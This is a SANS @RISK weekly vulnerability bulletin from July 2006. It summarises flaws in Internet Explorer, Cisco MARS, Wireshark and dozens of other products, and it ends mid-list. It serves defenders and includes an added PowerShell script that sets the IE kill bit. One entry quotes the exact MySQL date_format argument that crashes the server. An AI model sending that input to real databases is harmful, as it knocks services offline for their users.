@RISK: The Consensus Security Vulnerability Alert

Volume: V, Issue: 29
July 24, 2006

Anyone using Oracle should already have installed the July updates. Cisco MARS users should upgrade to 4.2.1. And Internet Explorer users may want to set the kill bit for ActiveX UUID because Microsoft hasn't confirmed the existence of the memory corruption flaw posted by HD Moore. Also, there were more problems discovered in wireless routers - this time in D-Link routers.

If you work in the process control or power industries, hackers have your systems targeted. To fight back, there is new security procurement language you can use to ensure vendors deliver more secure systems. Come to the SCADA/Process Control Security Summit in Las Vegas to learn how to use it.
SCADA Summit: http://www.sans.org/scadasummit_fall06/
Network Security 2006 (also in Las Vegas): http://www.sans.org/ns2006/

@RISK is the SANS community's consensus bulletin summarizing the most important vulnerabilities and exploits identified during the past week and providing guidance on appropriate actions to protect your systems (PART I). It also includes a comprehensive list of all new vulnerabilities discovered in the past week (PART II).

Summary of the vulnerabilities reported this week:

    Category                                  # of Updates & Vulnerabilities
    Microsoft Office                          2
    Other Microsoft Products                  7 (#2)
    Third Party Windows Apps                  13
    Linux                                     4
    Solaris                                   4
    Cross Platform                            14 (#1, #3, #4)
    Web Application - Cross Site Scripting    4
    Web Application - SQL Injection           6
    Web Application                           24
    Network Device                            3
    Hardware                                  1

****************** Sponsored By Blue Coat Systems, Inc. *****************

New security ebook on Information Theft Prevention

In The Definitive Guide to Information Theft Prevention, security author Dan Sullivan provides advice on information protection and privacy regulations; addressing risks from employee home PCs and other unmanaged devices; securing corporate-managed devices; and utilizing new technologies. This guide also discusses risk management, incident responses and emerging best practices for information security. Download the eBook now.

http://www.sans.org/info.php?id=1237

*************************************************************************

Summer Security Training Extravaganza

Over the next two months, you may attend one or more of 50 SANS courses in 20 cities on four continents. And if you cannot make those events, because of travel restrictions, you may attend live SANS courses with the best teachers in the world, without leaving your home. You can even take SANS courses online at your own schedule. Attendance at SANS educational events is experiencing the largest growth spurt in half a decade. Pick your class and register early to get a seat.

http://www.sans.org/index.php

*************************************************************************

Table Of Contents
Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys (www.qualys.com)
Microsoft Office
Other Microsoft Products
Third Party Windows Apps
Linux
Solaris
Cross Platform
Web Application - Cross Site Scripting
Web Application - SQL Injection
Web Application
Network Device
Hardware

********************** Sponsored Links: ********************************

1) Free software! Patch & Spyware Management! A complete security solution from Shavlik.

http://www.sans.org/info.php?id=1238

*************************************************************************

PART I Critical Vulnerabilities

Part I is compiled by Rohit Dhamankar and Rob King at TippingPoint, a division of 3Com, as a by-product of that company's continuous effort to ensure that its intrusion prevention products effectively block exploits using known vulnerabilities. TippingPoint's analysis is complemented by input from a council of security managers from twelve large organizations who confidentially share with SANS the specific actions they have taken to protect their systems. A detailed description of the process may be found at http://www.sans.org/newsletters/cva/#process

Widely Deployed Software
  • (2) HIGH: Internet Explorer WebViewFolderIcon ActiveX Control Memory Corruption (0-day)
  • Affected:
    • Internet Explorer version 6.0
    • Possibly all versions of IE
  • Description: Internet Explorer contains a memory corruption flaw that is triggered when the "SetSlice" method is invoked on the "WebViewFolderIcon" ActiveX object. A malicious web page can exploit the flaw to potentially execute arbitrary code on a user's system. The technical details required to craft an exploit have been publicly posted.

  • Status: Microsoft has not confirmed the flaw, and no updates are available. As a workaround, set the kill bit for the ActiveX control with UUID "{E5DF9D10-3B52-11D1-83E8-00A0C90DC849}".

  • Council Site Actions: All reporting council sites are waiting on additional information and a patch from the vendor. They will most likely deploy the patch during a regularly scheduled systems maintenance cycle.

  • References:
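As an added illustration of the kill-bit workaround above (this is not code from the bulletin), the following PowerShell sets Internet Explorer's kill bit for the CLSID named in the entry and then verifies it. It assumes an elevated session on the affected Windows host; the registry location and the 0x400 flag value are the ones Internet Explorer checks for ActiveX compatibility.

```powershell
# Added example: set and verify the IE kill bit for the WebViewFolderIcon control.
# Run from an elevated PowerShell session on the affected host.

$clsid   = '{E5DF9D10-3B52-11D1-83E8-00A0C90DC849}'   # CLSID quoted in the bulletin
$killBit = 0x400                                      # "kill bit" value in Compatibility Flags

# IE reads the per-CLSID compatibility flags from this key; on 64-bit Windows the
# 32-bit browser reads the Wow6432Node copy, so both are handled when present.
$bases = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
) | Where-Object { Test-Path $_ }

function Set-KillBit {
    param([string]$Base, [string]$Clsid, [int]$Flag)

    $key = Join-Path $Base $Clsid
    if (-not (Test-Path $key)) {
        New-Item -Path $key -Force | Out-Null
    }

    # Preserve any flags already set on the control and OR in the kill bit.
    $existing = (Get-ItemProperty -Path $key -Name 'Compatibility Flags' `
                 -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $existing) { $existing = 0 }
    $newFlags = $existing -bor $Flag
    Set-ItemProperty -Path $key -Name 'Compatibility Flags' -Value $newFlags -Type DWord

    # Verify: the control is blocked only if the 0x400 bit is actually set.
    $flags = (Get-ItemProperty -Path $key -Name 'Compatibility Flags').'Compatibility Flags'
    if (($flags -band $Flag) -eq $Flag) {
        Write-Output ("Kill bit set under {0} (Compatibility Flags = 0x{1:X})" -f $key, $flags)
    } else {
        Write-Error ("Kill bit NOT set under {0}" -f $key)
    }
}

foreach ($base in $bases) {
    Set-KillBit -Base $base -Clsid $clsid -Flag $killBit
}
```

Users must close and reopen Internet Explorer for the flag to take effect; auditing the same value across a fleet (for example with a login script or configuration-management check) confirms the workaround stayed in place until a vendor patch ships.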
Other Software
  • (3) HIGH: Cisco MARS Multiple Vulnerabilities
  • Affected:
    • Cisco MARS versions prior to 4.2.1
  • Description: Cisco MARS (Monitoring, Analysis and Response System) is designed to correlate network attacks in order to stop them. Cisco MARS uses the JBoss application server, and versions prior to 4.2.1 ship with an insecure JBoss installation. As a result, an unauthenticated attacker can access JBoss's "jmx-console" via HTTP and execute arbitrary commands, resulting in a total compromise of the MARS system. Complete technical details and a proof-of-concept exploit have been publicly posted. Additionally, Cisco MARS ships with an Oracle database that has default usernames and passwords. This can be exploited to access sensitive information stored in the database, such as authentication credentials for network security devices, and/or to execute some SQL statements against the Oracle server.

  • Status: Cisco confirmed, upgrade Cisco MARS to version 4.2.1.

  • Council Site Actions: Only one of the responding council sites is using the affected software and only on one machine (an evaluation copy). They will patch that machine next week.

  • References:
  • (4) HIGH: Wireshark Ethereal Multiple Protocol Decoding Vulnerabilities
  • Affected:
    • Ethereal versions prior to 0.99.2
  • Description: Wireshark (formerly Ethereal) is a popular open source network sniffer and protocol analyzer for Unix and Windows platforms. The software contains format string, off-by-one or buffer overflow vulnerabilities in parsing the following protocols: ANSI MAP, CheckPoint FW-1, MQ, XML, NCP NMAS, NCP NDPS, NTP and NFS. Many of these flaws can be exploited to execute arbitrary code with the privileges of the ethereal process (typically "root" when ethereal is being used as a sniffer). To exploit these flaws, an attacker has to either inject the malicious packets into the network traffic being sniffed by ethereal, or entice a client to open a specially crafted packet capture file. The technical details can be obtained by examining the fixed code. Note that any network applications based on ethereal protocol decoder modules may also be affected.

  • Status: Wireshark has confirmed the flaws and released version 0.99.2.

  • Council Site Actions: Ethereal is used minimally at most council sites, but is not supported by their central IT departments. Most sites will advise their users to upgrade. One site has already pushed manual updates to the small number of affected users.

  • References:
Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 29, 2006

This list is compiled by Qualys ( www.qualys.com ) as part of that company's ongoing effort to ensure its vulnerability management web service tests for all known vulnerabilities that can be scanned. As of this week Qualys scans for 5088 unique vulnerabilities. For this special SANS community listing, Qualys also includes vulnerabilities that cannot be scanned remotely.


  • 06.29.1 - CVE: Not Available
  • Platform: Microsoft Office
  • Title: Microsoft Powerpoint Multiple Unspecified Vulnerabilities
  • Description: Microsoft PowerPoint is prone to multiple remote vulnerabilities. Please check the attached advisory for details. Microsoft PowerPoint 2003 is affected.
  • Ref: http://www.securityfocus.com/bid/18993/info

  • 06.29.2 - CVE: CVE-2006-3655, CVE-2006-3656, CVE-2006-3660
  • Platform: Microsoft Office
  • Title: Microsoft Powerpoint Multiple Unspecified Vulnerabilities
  • Description: Microsoft PowerPoint is prone to multiple remote vulnerabilities which may allow remote attackers to cause crashes, or to execute arbitrary machine code in the context of the affected application. PowerPoint versions 2003 and prior are reported to be vulnerable.
  • Ref: http://www.securityfocus.com/bid/18993

  • 06.29.3 - CVE: CVE-2006-3730
  • Platform: Other Microsoft Products
  • Title: Internet Explorer WebViewFolderIcon Denial of Service
  • Description: Internet Explorer is prone to a denial of service issue when the browser processes a malicious "WebViewFolderIcon" object. Microsoft Internet Explorer versions 6.0 SP1 and 6.0 are vulnerable.
  • Ref: http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html

  • 06.29.4 - CVE: Not Available
  • Platform: Other Microsoft Products
  • Title: Internet Explorer DXImageTransform Properties Denial of Service
  • Description: Internet Explorer is prone to a denial of service issue which exists at the "StartColorStr" and "EndColorStr" properties of the "DXImageTransform.Microsoft.Gradient" ActiveX object. Internet Explorer 6 SP2 is affected.
  • Ref: http://browserfun.blogspot.com/2006/07/mobb-17-gradient-startcolorstr.html

  • 06.29.5 - CVE: CVE-2006-2492, CVE-2006-3653, CVE-2006-3654
  • Platform: Other Microsoft Products
  • Title: Microsoft Works Spreadsheet Multiple Remote Vulnerabilities
  • Description: Microsoft Works is vulnerable to multiple unspecified buffer overflow issues when it attempts to import malicious files. Microsoft Works version 8.0 is vulnerable.
  • Ref: http://www.frsirt.com/english/advisories/2006/2813

  • 06.29.6 - CVE: Not Available
  • Platform: Other Microsoft Products
  • Title: Microsoft Internet Explorer MHTMLFile Denial of Service
  • Description: Internet Explorer is exposed to a denial of service issue. The problem occurs when the application is used to view a malicious URI or web page consisting of a malformed MHTMLfile element. Internet Explorer version 6 SP2 is affected.
  • Ref: http://www.securityfocus.com/bid/19013

  • 06.29.7 - CVE: Not Available
  • Platform: Other Microsoft Products
  • Title: Internet Explorer DataSourceControl Denial of Service
  • Description: Internet Explorer is prone to a denial of service issue in the "getDataMemberName()" properties of the "DataSourceControl" ActiveX control object. Internet Explorer 6 SP2 is affected.
  • Ref: http://browserfun.blogspot.com/2006/07/mobb-19-datasourcecontrol.html

  • 06.29.8 - CVE: Not Available
  • Platform: Other Microsoft Products
  • Title: Internet Explorer OVCtl Denial of Service
  • Description: Microsoft Internet Explorer is prone to a denial of service issue which is triggered when the browser processes the "NewDefaultItem" method of the "OVCtl" object. All current versions are affected.
  • Ref: http://browserfun.blogspot.com/2006/07/mobb-20-ovctl-newdefaultitem.html

  • 06.29.9 - CVE: Not Available
  • Platform: Other Microsoft Products
  • Title: Internet Explorer Content-Type Denial of Service
  • Description: Microsoft Internet Explorer is prone to a denial of service vulnerability. The vulnerability presents itself when the browser processes excessively large "Content-Type" HTTP response headers consisting of more than approximately 1M bytes. This crash reportedly occurs due to a flaw in the "wininet.dll" library.
  • Ref: http://www.securityfocus.com/bid/19092

  • 06.29.10 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: RARLAB WinRAR LHA Filename Handling Buffer Overflow
  • Description: RARLAB WinRAR is a compression utility capable of reading and writing files using several different archival formats. It is susceptible to a remote buffer overflow vulnerability, which is caused by a failure of the application to properly bounds check user-supplied input prior to copying it to an insufficiently-sized memory buffer. Versions from 3.0 to 3.60 beta 6 are reported as vulnerable.
  • Ref: http://www.securityfocus.com/bid/19043

  • 06.29.11 - CVE: CVE-2006-3697
  • Platform: Third Party Windows Apps
  • Title: Outpost Firewall PRO Local Privilege Escalation
  • Description: Outpost Firewall PRO is a firewall application. It is vulnerable to a local privilege escalation issue when the application fails to drop SYSTEM level privileges when spawning a child process. Outpost Firewall Pro versions 3.51.759.6511 (462) and earlier are vulnerable.
  • Ref: http://www.ben.goulding.com.au/secad.html

  • 06.29.12 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Agnitum Outpost Firewall FiltNT.SYS Local Denial of Service
  • Description: Outpost Firewall is a Win32 personal firewall suite developed by Agnitum. Outpost Firewall is prone to a local denial of service vulnerability. The problem occurs in "filtnt.sys" when handling specially malformed input data. Outpost Firewall Pro version 3.5.631 is affected by this issue.
  • Ref: http://www.securityfocus.com/archive/1/440427

  • 06.29.13 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Symantec Norton Personal Firewall Registry Access Denial of Service
  • Description: Symantec Norton Personal Firewall is prone to a denial of service vulnerability. This issue occurs when a program calls certain API calls for manipulating the Windows Registry on Norton service registry keys. Norton Personal Firewall 2006 version 9.1.0.33 is affected.
  • Ref: http://www.securityfocus.com/bid/18995

  • 06.29.14 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Sunbelt Kerio Personal Firewall CreateRemoteThread Denial of Service
  • Description: Sunbelt Kerio Personal Firewall is prone to a denial of service issue which occurs when a program calls the CreateRemoteThread Windows API call. This call is hooked by the application in every user mode process. Sunbelt Kerio Personal Firewall versions 4.3.246 and 4.2.3.912 are affected.
  • Ref: http://www.matousec.com/info/advisories/Kerio-Terminating-kpf4ss-exe-using-internal-runtime-error.php

  • 06.29.15 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: VisNetic Mail Server Multiple File Include Vulnerabilities
  • Description: VisNetic Mail Server is prone to multiple remote file include vulnerabilities and a local file include vulnerability because the application fails to properly sanitize user-supplied input. VisNetic Mail Server version 8.3.5 is affected.
  • Ref: http://www.securityfocus.com/bid/19002

  • 06.29.16 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Rabox WinLPD Remote Buffer Overflow
  • Description: Rabox Winlpd provides LPD print-server support and LPR print-client support. It is affected by a remote buffer overflow issue due to insufficient sanitization of user-supplied data. Winlpd version 1.2, build 1076 is affected.
  • Ref: http://www.securityfocus.com/bid/19011

  • 06.29.17 - CVE: CVE-2006-3697
  • Platform: Third Party Windows Apps
  • Title: Lavasoft Personal Firewall Local Privilege Escalation
  • Description: Lavasoft Personal Firewall is a firewall for Windows. The application can allow local attackers to gain elevated privileges. This issue arises because the application fails to drop SYSTEM level privileges when spawning a child process, specifically an open folder control window. Version 1.0.543.5722 (433) is reported to be vulnerable.
  • Ref: http://www.ben.goulding.com.au/secad.html

  • 06.29.18 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Lotus Notes Mail Recipient Information Disclosure
  • Description: Lotus Notes is an email client that is available for Microsoft Windows. It is exposed to an information disclosure issue. Please refer to the link below for further details. IBM Lotus Notes versions 7.0.1 and earlier are affected.
  • Ref: http://www-1.ibm.com/support/docview.wss?rs=899&uid=swg21240386

  • 06.29.19 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Various Citrix Applications MFEvent.DLL Privilege Escalation
  • Description: Various Citrix applications contain an error that allows an authenticated user to escalate privileges. Citrix Metaframe, Citrix MetaFrame Presentation Server and Citrix Presentation Server are affected.
  • Ref: http://www.securityfocus.com/bid/19056/info

  • 06.29.20 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: PCAnywhere CIF Files Local Privilege Escalation
  • Description: PCAnywhere is a remote control and management application. It is affected by a local privilege escalation issue because the application fails to secure access to "CIF (Caller)" files. PCAnywhere version 12.5 is affected.
  • Ref: http://www.securityfocus.com/bid/19059

  • 06.29.21 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Intervations FileCopa LIST Command Remote Buffer Overflow
  • Description: FileCopa FTP Server is a file transfer application designed for use on Microsoft Windows computers. FileCopa is prone to a buffer overflow vulnerability when handling data through the LIST command. Reportedly, passing 350 bytes of data may overflow a finite sized internal memory buffer. Version 1.01 of the software is vulnerable.
  • Ref: http://www.appsec.ch/docs/2006-07-19-fileCopa.txt

  • 06.29.22 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Quick 'n Easy FTP Server LIST Command Buffer Overflow
  • Description: Quick 'n Easy FTP Server is prone to a buffer overflow vulnerability. Excessively long arguments to the LIST command may result in an overflow condition. An attacker can exploit this issue to execute arbitrary machine code in the context of the affected server application. This likely occurs with SYSTEM level privileges. Quick And Easy FTP Server version 3.0.2 is affected.
  • Ref: http://www.securityfocus.com/bid/19067

  • 06.29.23 - CVE: Not Available
  • Platform: Linux
  • Title: Linux Kernel USB Driver Data Queue Local Denial of Service
  • Description: The Linux kernel is vulnerable to a local denial of service issue due to a design error with the USB FTDI SIO driver. The code "drivers/usb/serial/ftdi_sio.c" imposes no limit on the amount of data that can be written to the serial port. Linux kernel versions 2.6.x are vulnerable.
  • Ref: http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.16.27

  • 06.29.24 - CVE: Not Available
  • Platform: Linux
  • Title: Linux Kernel PROC Filesystem Local Privilege Escalation
  • Description: The Linux kernel is susceptible to a local privilege escalation issue due to a race condition in the "proc" filesystem. The exploit demonstrating this issue accesses "/proc/*/environ" files, setting setuid permissions. The 2.6 series of the Linux kernel is vulnerable to this issue.
  • Ref: http://www.securityfocus.com/bid/18992

  • 06.29.25 - CVE: CVE-2006-1320
  • Platform: Linux
  • Title: Debian GNU/Linux Rssh Security Bypass
  • Description: rssh is a shell that restricts users to using scp or sftp. The Debian GNU/Linux rssh package contains a programming error in "util.c" which allows a bypass of security controls. Additionally, this vulnerability can be used to pass -e options to CVS. The error allows for execution of cvs directly, and the security mechanisms normally controlling -e options will be circumvented. Debian rssh version 2.3.0-1 is affected.
  • Ref: http://www.securityfocus.com/bid/18999

  • 06.29.26 - CVE: CVE-2006-3693
  • Platform: Linux
  • Title: Rocks Clusters Local Privilege Escalation Vulnerabilities
  • Description: Rocks Clusters is a clustering solution for the x86 and IA64 versions of the Redhat Linux operating system. It is susceptible to multiple local privilege escalation issues due to insufficient sanitization of user-supplied input. Rocks Clusters versions 4.1 and earlier are affected.
  • Ref: http://xavier.tigerteam.se/advisories/TSEAD-200606-6.txt

  • 06.29.27 - CVE: Not Available
  • Platform: Solaris
  • Title: Sun Solaris 10 Kernel Patches Denial of Service
  • Description: Sun Solaris 10 is vulnerable to a denial of service vulnerability. Solaris 10 with kernel patches 118822-29 or later for SPARC and 118844-29 or later for x86 are reported as vulnerable.
  • Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102344-1&searchclause=

  • 06.29.28 - CVE: CVE-2006-3728
  • Platform: Solaris
  • Title: Solaris Kernel Debugger KMDB(1) Local Denial of Service
  • Description: Solaris is vulnerable to a local unspecified denial of service issue when the kernel debugger kmdb(1) is loaded. Sun Solaris x86 version 10 is vulnerable.
  • Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102344-1

  • 06.29.29 - CVE: Not Available
  • Platform: Solaris
  • Title: Sun Solaris Event Port API Denial of Service
  • Description: Sun Solaris is prone to a local denial of service vulnerability, the cause of which is currently unknown. An attacker may execute an application that employs the event port API in a manner that causes a system panic. Solaris version 10.0 is reported as vulnerable.
  • Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102286-1&searchclause=

  • 06.29.30 - CVE: Not Available
  • Platform: Solaris
  • Title: Solaris Net Mount Point Denial of Service
  • Description: Solaris is vulnerable to an unspecified denial of service issue with the "/net" mount point. Sun Solaris versions 10 and 10 x86 with the autofs service enabled are vulnerable.
  • Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102286-1&searchclause=

  • 06.29.31 - CVE: Not Available
  • Platform: Cross Platform
  • Title: MySQL Server Date_Format Denial of Service
  • Description: MySQL is susceptible to a remote denial of service vulnerability because the database server fails if the "select date_format" SQL function is called with "('%d%s', 1);" argument. MySQL versions prior to 4.1.18, 5.0.19 and 5.1.6 are affected.
  • Ref: http://www.securityfocus.com/bid/19032

  • 06.29.32 - CVE: Not Available
  • Platform: Cross Platform
  • Title: DUMB Impulse Tracker Files Remote Heap Buffer Overflow
  • Description: DUMB is an IT, XM, S3M and MOD player library. It contains a heap overflow vulnerability that is caused by the software's failure to properly bounds check user-supplied input before copying it to an insufficiently sized memory buffer. Versions 0.9.3 and prior are reported as vulnerable.
  • Ref: http://www.securityfocus.com/bid/19025

  • 06.29.33 - CVE: Not Available
  • Platform: Cross Platform
  • Title: McAfee EPolicy Orchestrator Framework Service Directory Traversal
  • Description: McAfee ePolicy Orchestrator is prone to a remote directory traversal vulnerability. This vulnerability exists in the Framework service component of the EPO management console. This situation arises as users are able to submit file and directory names followed by the name of an XML file; however the application does not properly sanitize this data. Versions of the software from 1.0 through 3.5 are vulnerable.
  • Ref: http://www.eeye.com/html/research/advisories/AD20060713.html

  • 06.29.34 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Mercury Messenger Users Directory Information Disclosure
  • Description: Mercury Messenger is a chat application. It is affected by an information disclosure issue because it fails to properly set permissions on the "/Users" directory and files within this directory. All current versions are affected.
  • Ref: http://www.securityfocus.com/bid/19005

  • 06.29.35 - CVE: Not Available
  • Platform: Cross Platform
  • Title: OpenVMS Unspecified Local Denial of Service
  • Description: OpenVMS is a mainframe-like operating system. It is prone to an unspecified local denial of service vulnerability in version 7.3-2.
  • Ref: http://www.securityfocus.com/bid/19008

  • 06.29.36 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Asterisk IAX2 Request Flood Remote Denial of Service
  • Description: Asterisk is a private branch exchange (PBX) application. It is susceptible to a remote denial of service vulnerability. The software is unable to efficiently handle numerous unauthenticated call requests. Asterisk versions prior to 1.2.10 are vulnerable to this issue.
  • Ref: http://www.securityfocus.com/bid/19009

  • 06.29.37 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Zoho Virtual Office Message HTML Injection
  • Description: Zoho Virtual Office is a collaboration suite available for Microsoft Windows and Linux. It is prone to an HTML injection vulnerability, due to a failure to properly sanitize user-supplied input before using it in dynamically generated content. Versions 3.2 Build 3210 and prior are reported as vulnerable.
  • Ref: http://www.securityfocus.com/bid/19016

  • 06.29.38 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Oracle July 2006 Security Update Multiple Vulnerabilities
  • Description: Various Oracle applications including Oracle Database, Oracle Application Server, Oracle Collaboration Suite, Oracle E-Business Suite and Applications, Oracle Pharmaceutical Applications, Oracle Enterprise Manager, Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne are affected by multiple vulnerabilities. Please refer to the Oracle advisory for details.
  • Ref: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2006.html

  • - - CVE: CVE-2006-3627, CVE-2006-3632
  • Platform: Cross Platform
  • Title: Wireshark Protocol Dissectors Multiple Vulnerabilities
  • Description: Wireshark is a network packet analyzer and the successor to Ethereal. It is prone to multiple vulnerabilities which may permit attackers to execute arbitrary code, which can facilitate a compromise of an affected computer or cause a denial of service condition to legitimate users of the application. Versions 0.99.1 and prior are reported as vulnerable.
  • Ref: http://www.wireshark.org/security/wnpa-sec-2006-01.html

  • 06.29.40 - CVE: CVE-2006-3589
  • Platform: Cross Platform
  • Title: VMware Information Disclosure
  • Description: VMware is a set of server emulation applications. It is vulnerable to an information disclosure issue due to insecure permissions being set on SSL key and certificate files. Vmware Player for Linux, VMware Workstation for Linux, VMware Server for Linux and VMware Infrastructure 3 are vulnerable.
  • Ref: http://kb.vmware.com/kb/2467205

  • 06.29.41 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Gnu GCC FastJar Archive Extraction Directory Traversal
  • Description: FastJar is an implementation of the popular jar utility. The gnu gcc implementation of Fastjar is exposed to a directory traversal issue due to insufficient sanitization of user-supplied data. GNU gcc versions 4.1 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/19070

  • 06.29.42 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Cisco Security Monitoring Analysis and Response System Multiple Vulnerabilities
  • Description: Cisco Security Monitoring, Analysis and Response System (CS-MARS) is a security system that correlates and analyzes data in event logs received from various network devices. It is affected by multiple information disclosure, command execution and privilege escalation issues. Cisco has released version 4.2.1 to address these issues.
  • Ref: http://www.cisco.com/warp/public/707/cisco-sa-20060719-mars.shtml

  • 06.29.43 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Cisco Security Monitoring Analysis and Response System JBoss Command Execution
  • Description: Cisco Security Monitoring, Analysis and Response System (CS-MARS) is a security system that correlates and analyzes data in event logs received from various network devices. It is prone to a vulnerability that could permit the execution of arbitrary commands. This issue occurs because the JBoss web application server may allow a remote unauthenticated user to execute arbitrary shell commands with the privileges of the CS-MARS administrator. Cisco has released CS-MARS version 4.2.1 to address this issue.
  • Ref: http://www.cisco.com/warp/public/707/cisco-sa-20060719-mars.shtml

  • 06.29.44 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Sybase Financial Fusion Server Unspecified Security Vulnerability
  • Description: Sybase Financial Fusion Server is an e-financial solution. It is affected by an unspecified issue in the Consumer Banking Suite. Please refer to the referenced advisory for details.
  • Ref: http://www.securityfocus.com/bid/19076

  • 06.29.45 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Plesk Control Panel File_Manager.PHP Cross-Site Scripting
  • Description: Plesk Control Panel is an online control panel implemented in PHP. It is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input to the "file" parameter of the "filemanager.php" script. Versions 8.0.0 and prior are affected.
  • Ref: http://www.securityfocus.com/bid/19017

  • 06.29.46 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Loudblog Index.PHP Cross-Site Scripting
  • Description: Loudblog is a content management application. It is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input to the "page" parameter of the "index.php" script. Versions prior to 0.5 are affected.
  • Ref: http://loudblog.de/forum/viewtopic.php?id=756

  • 06.29.47 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: OWASP WebScarab Cross-Site Scripting
  • Description: OWASP WebScarab is a framework used in testing applications that utilize the HTTP and HTTPS protocols. It is prone to a cross-site scripting vulnerability because it fails to sanitize HTML and script code from URI input. OWASP WebScarab version 2006.6.21 0003 is affected.
  • Ref: http://www.securityfocus.com/bid/19063

  • 06.29.48 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Paddelberg Top XL Multiple Cross-Site Scripting Vulnerabilities
  • Description: Paddelberg Top XL is a topsite script. It is vulnerable to multiple cross-site scripting issues due to insufficient sanitization of user-supplied input to various scripts. Paddelberg Top XL versions 1.1 and earlier are vulnerable.
  • Ref: http://www.securityfocus.com/bid/19098

  • 06.29.49 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Invision Power Board IPSClass.PHP SQL Injection
  • Description: Invision Power Board is a web-based bulletin board. It is prone to an SQL injection vulnerability due to improper sanitization of user-supplied input to the "HTTP_CLIENT_IP" parameter of the "ipsclass.php" script. Invision Board versions 2.1.6 and earlier are vulnerable.
  • Ref: http://www.securityfocus.com/bid/18984

  • 06.29.50 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: MyBB Client-IP SQL Injection
  • Description: MyBB is a bulletin-board application. It is exposed to an SQL injection issue due to insufficient sanitization of user-supplied input. MyBulletinBoard versions 1.1.5 and earlier are affected.
  • Ref: http://www.securityfocus.com/archive/1/440163

  • 06.29.51 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Professional Home Page Tools Guestbook Multiple SQL Injection Vulnerabilities
  • Description: Professional Home Page Tools Guestbook is a web-based guestbook application. It is prone to multiple SQL injection vulnerabilities because it fails to properly sanitize user-supplied input to various scripts. All current versions are vulnerable.
  • Ref: http://www.securityfocus.com/bid/19019

  • 06.29.52 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Francisco Charrua Photo-Gallery Room.PHP SQL Injection
  • Description: Francisco Charrua Photo-Gallery is a web-based photo-gallery application. Insufficient sanitization of the "id" parameter in the "Room.php" script exposes the application to an SQL injection issue. Photo-Gallery version 1.0 is affected.
  • Ref: http://www.securityfocus.com/bid/19020

  • 06.29.53 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Eskolar CMS Multiple SQL Injection Vulnerabilities
  • Description: Eskolar CMS is a web-based content management application. It is prone to multiple SQL injection vulnerabilities because it fails to properly sanitize user-supplied input to multiple scripts. Eskolar CMS version 0.9.0 is affected.
  • Ref: http://www.securityfocus.com/bid/19045

  • 06.29.54 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: GeodesicSolutions Products Multiple SQL Injection Vulnerabilities
  • Description: GeodesicSolutions GeoAuctions Enterprise and Premier are web-based auction applications. Insufficient sanitization of user-supplied input exposes the applications to multiple SQL injection issues. All current versions of the software are affected.
  • Ref: http://www.securityfocus.com/bid/19093

  • 06.29.55 - CVE: Not Available
  • Platform: Web Application
  • Title: Mail2Forum Multiple Remote File Include Vulnerabilities
  • Description: Mail2Forum is a mailing-list add-on for the phpBB forum software. It is affected by multiple remote file include issues due to insufficient sanitization of the "m2f_root_path" parameter of multiple PHP scripts. All current versions are affected.
  • Ref: http://www.securityfocus.com/bid/19038

  • 06.29.56 - CVE: Not Available
  • Platform: Web Application
  • Title: ExtCalendar For Mambo ExtCalendar.php Remote File Include
  • Description: ExtCalendar is a module for a content management system called Mambo. It is vulnerable to a remote file include issue due to insufficient sanitization of user-supplied input to the "mosConfig_absolute_path" parameter in the "extcalendar.php" script. ExtCalendar versions 2.0 and earlier are vulnerable.
  • Ref: http://www.securityfocus.com/bid/19042

  • 06.29.57 - CVE: Not Available
  • Platform: Web Application
  • Title: LoudMouth Module For Mambo ABBC.Class.PHP Remote File Include
  • Description: LoudMouth is a module for Mambo. It is prone to a remote file include vulnerability because it fails to properly sanitize user-supplied input to the "mosConfig_absolute_path" parameter of the "abbc.class.php" script. Version 4.0j is affected.
  • Ref: http://www.securityfocus.com/bid/19044

  • 06.29.58 - CVE: Not Available
  • Platform: Web Application
  • Title: osDate Multiple HTML Injection Vulnerabilities
